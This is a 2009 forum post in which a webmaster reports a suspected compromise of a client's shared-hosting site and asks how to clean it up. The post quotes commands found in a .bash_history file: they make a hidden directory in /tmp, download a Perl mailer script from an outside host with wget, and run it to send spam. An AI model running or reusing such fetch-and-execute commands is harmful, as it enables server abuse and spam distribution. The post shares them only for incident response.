Welcome to WebmasterWorld Guest from

Forum Moderators: Ocean10000 & incrediBILL & phranque

Message Too Old, No Replies

Server hack - help please! .bash history spam?

2:15 am on Oct 26, 2009 (gmt 0)

New User

5+ Year Member

joined:Jan 21, 2009
posts: 21
votes: 0

Hello everyone,
Not sure if I should post this here or in the search forum. I have a new client that came to me because his site's rankings plummetted a year ago. The site is still indexed and I started checking for a server hack.
The site is on a shared server and malware is detected on other sites within that server.
I started checking files on the site line by line. In the .bash_history file I saw the following code:

cd /tmp
mkdir .dc
cd .dc
wget infbr.iespana.es/enviar.pl
echo revbrk@hotmail.com > rev.txt
perl enviar.pl rev.txt sudfhsd sduhf usdhf
wget [topmagia.ru...]
wget [topmagia.ru...]
perl enviar.pl novaboa.txt ocarteiro@ocarteiro.com.br "O carteiro enviou este cartao para ti" ocarteiro.txt

Which fits the profile of spam. I plan to call the hosting company tomorrow and request the site be moved to another server.

My question is, can I remove the content of this file (what and how much should I delete?). And are there any suggestions on where else I should look to see what this code has done?

I am not a whiz when it comes to server-side files. Any help would be greatly appreaciated!